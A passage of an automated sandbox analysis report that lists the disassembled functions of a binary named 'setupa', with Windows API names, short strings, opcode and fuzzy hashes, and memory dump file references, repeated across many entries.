                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 426b9eac409b7ff15a383615fc3b56e76daf99ba2d7e73c76012abf250fec1f5
                                                                                                              • Instruction ID: d468091d45381abec41ea88108e77066453d1a8dfac25887af235cfab153a44a
                                                                                                              • Opcode Fuzzy Hash: 426b9eac409b7ff15a383615fc3b56e76daf99ba2d7e73c76012abf250fec1f5
                                                                                                              • Instruction Fuzzy Hash: BA819B22A18602C9FB319F7594916BD26A0BF44FDAFC4813DDD0E97A91DE3CE446E710
                                                                                                              Function 00007FF689641384 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1557788787-0
                                                                                                              • Opcode ID: 49825a6f98e9747c27f4630de9e174b13460c8f413418d393562f2b42130e6ac
                                                                                                              • Instruction ID: c854f8476262e008efcc82c63fcf1038cd271caa32a78962ad4a3d738549ed6a
                                                                                                              • Opcode Fuzzy Hash: 49825a6f98e9747c27f4630de9e174b13460c8f413418d393562f2b42130e6ac
                                                                                                              • Instruction Fuzzy Hash: 2D215031E18792C1E6248F52A440029A7A4FF99FD5B484139DF9EA3BA8DF3CE492C704
                                                                                                              Function 00007FF6896485B7 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 232COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DecodeExceptionPointerRaise
                                                                                                              • String ID: csm
                                                                                                              • API String ID: 2415446407-1018135373
                                                                                                              • Opcode ID: 6d150f7aa453deacd86b64b0c6899e2f2e0aa7e9f9aba382eb4e338adb66b9a5
                                                                                                              • Instruction ID: 631edccb4199486709249f527e2be70bb10056524c1ba6c03deabef6eeb1f644
                                                                                                              • Opcode Fuzzy Hash: 6d150f7aa453deacd86b64b0c6899e2f2e0aa7e9f9aba382eb4e338adb66b9a5
                                                                                                              • Instruction Fuzzy Hash: 13518C62A14BC6CAEB65CF38C9402EC3360FB58B98F549229DB5D43A56DF39E1E1C700
                                                                                                              Function 00007FF689645808 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Event
                                                                                                              • String ID: pScheduler$version
                                                                                                              • API String ID: 4201588131-3154422776
                                                                                                              • Opcode ID: 547f109356b54737c1ca3026f7509aa8098e79f1e24ba0fc8c150671691a0f5d
                                                                                                              • Instruction ID: fc8ce6765836cebc030bf6946f9e7c22f1b1e187945866416e07bc395f14d19e
                                                                                                              • Opcode Fuzzy Hash: 547f109356b54737c1ca3026f7509aa8098e79f1e24ba0fc8c150671691a0f5d
                                                                                                              • Instruction Fuzzy Hash: 4B31A231A08642D6FA20DF64E8900B823B0FF80B96F904239E65DC76E5DF2CE5D5DB40
                                                                                                              Function 00007FF689644DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                              • String ID: Main Invoked.
                                                                                                              • API String ID: 2776309574-1952101238
                                                                                                              • Opcode ID: 18040c3e2704eec9e4f278d6a6c374118b409a9e932da4cbf8eb26b9bac95459
                                                                                                              • Instruction ID: ebf1c7e1e2f1731cda3ca4b56f6118ff009f6edc4723f0300b6c8aa82c5a801b
                                                                                                              • Opcode Fuzzy Hash: 18040c3e2704eec9e4f278d6a6c374118b409a9e932da4cbf8eb26b9bac95459
                                                                                                              • Instruction Fuzzy Hash: A9316131A18B41C9FB60CF64E8943BA73A0FF94B95F500639DA9D866A4DF7CD184EB00
                                                                                                              Function 00007FF689645FA1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastModuleName
                                                                                                              • String ID: Main Returned.
                                                                                                              • API String ID: 2776309574-1078862748
                                                                                                              • Opcode ID: b11b02404f553d2f4a96b1ca325f4689d7817d672c915bbfd91e390250e11729
                                                                                                              • Instruction ID: 3cb90bab3638e2a62da65f565d9c03280223eeb387edc9a07527058a2ccdeb84
                                                                                                              • Opcode Fuzzy Hash: b11b02404f553d2f4a96b1ca325f4689d7817d672c915bbfd91e390250e11729
                                                                                                              • Instruction Fuzzy Hash: 4A31B431A18B41C6F720CF64E8503BA73A0FF54B95F500639D69D866A4DF3CE184CB00
                                                                                                              Function 00007FF68964427D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InformationObject
                                                                                                              • String ID: bObj$ect
                                                                                                              • API String ID: 1757262956-2883911777
                                                                                                              • Opcode ID: 2ddc7d36761d22a246cd55f3ac640d2faa213e5d704b3fd3f325a16265622f19
                                                                                                              • Instruction ID: a6784b1500f9a51514c68d8848291f2b4b502ef6f93f590adbc494164cc4302d
                                                                                                              • Opcode Fuzzy Hash: 2ddc7d36761d22a246cd55f3ac640d2faa213e5d704b3fd3f325a16265622f19
                                                                                                              • Instruction Fuzzy Hash: 0E018432B04781D5F710CF62A8054A967A4BB9CFD4F144035EE4D67B09DF38D982CB40
                                                                                                              Function 00007FF689642EA0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AssignObjectProcess
                                                                                                              • String ID: ject$obOb
                                                                                                              • API String ID: 1819803957-1437108869
                                                                                                              • Opcode ID: d9b4da8cd6c6c452126dcccc668882fc41112f1679ce739a5113ff58832cb83f
                                                                                                              • Instruction ID: 20b6c39b7bcecf0daea6c2f51103a9d8615c986ebfe411da7f04ef8d891705f1
                                                                                                              • Opcode Fuzzy Hash: d9b4da8cd6c6c452126dcccc668882fc41112f1679ce739a5113ff58832cb83f
                                                                                                              • Instruction Fuzzy Hash: DC012876B04B91C9F710CF62A8145AD6364BB98BD4F584139EE5C67B49DF38D582CB00
                                                                                                              Function 00007FF6896460AF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30libraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                              • String ID: msvcrt.dll
                                                                                                              • API String ID: 1646373207-370904613
                                                                                                              • Opcode ID: c52aab67628ba0e5acb43c610eea40ee1ece16153e31cf668cf62f0d697dbde9
                                                                                                              • Instruction ID: 7da3d4fdf7078704b1f91739f9c11d65223ccbcbb825394314f84f99f0b47a53
                                                                                                              • Opcode Fuzzy Hash: c52aab67628ba0e5acb43c610eea40ee1ece16153e31cf668cf62f0d697dbde9
                                                                                                              • Instruction Fuzzy Hash: 6EF0F421E2AA47C2EE559FA6F96413512A4FF89FD2F58043CD90EC63A0EF2CE854C754
                                                                                                              Function 00007FF689642E4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastThreadpoolWait
                                                                                                              • String ID: CreateThreadpoolWait
                                                                                                              • API String ID: 1788304134-540757568
                                                                                                              • Opcode ID: 39d11124d666ed6f034a6cc5f5b6448e27bd78e7d52ec4d090ef5773b968b1ed
                                                                                                              • Instruction ID: 48929d3af19ff5d41db43117de2fb92a897fd6c179856bd708feb26049741fb9
                                                                                                              • Opcode Fuzzy Hash: 39d11124d666ed6f034a6cc5f5b6448e27bd78e7d52ec4d090ef5773b968b1ed
                                                                                                              • Instruction Fuzzy Hash: C4F0C261B09606D1FE309F11F4143BA63A1BF54FA6F444339E5AE862E5EF2CE589CB00
                                                                                                              Function 00007FF689645150 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastThreadpoolWork
                                                                                                              • String ID: CreateThreadpoolWork
                                                                                                              • API String ID: 1144500323-245081381
                                                                                                              • Opcode ID: 60416ceb87ed910d99eddf1ad6bb23a78773a0a19d7f20b821ab419c61045978
                                                                                                              • Instruction ID: 00638c319207167a58435cb3e469c49eff4849d93f5bc827ee587b4568b2e4fd
                                                                                                              • Opcode Fuzzy Hash: 60416ceb87ed910d99eddf1ad6bb23a78773a0a19d7f20b821ab419c61045978
                                                                                                              • Instruction Fuzzy Hash: 98F0C221A09502D1FA20AF20F4113BA6360BF54BA6F444339E56E861E5EE2CE589CB00
                                                                                                              Function 00007FF689641230 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27threadtimeCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorLastThreadpoolTimer
                                                                                                              • String ID: CreateThreadpoolTimer
                                                                                                              • API String ID: 1405359104-3425787056
                                                                                                              • Opcode ID: 5e2644eb3c08079bfbd3097da2520d9a5de820b6efebffd6367bb1c552bf5fcc
                                                                                                              • Instruction ID: 2db37fe50461c559d89dd2861d307b14daa49338bd01b57065cc40e0a73ed783
                                                                                                              • Opcode Fuzzy Hash: 5e2644eb3c08079bfbd3097da2520d9a5de820b6efebffd6367bb1c552bf5fcc
                                                                                                              • Instruction Fuzzy Hash: 7EF09621B09602D1FA309F60F4153BA6360BF54FA6F80433DE5AE861E5EF2CE199DB40
                                                                                                              Function 00007FF689643391 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27threadCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
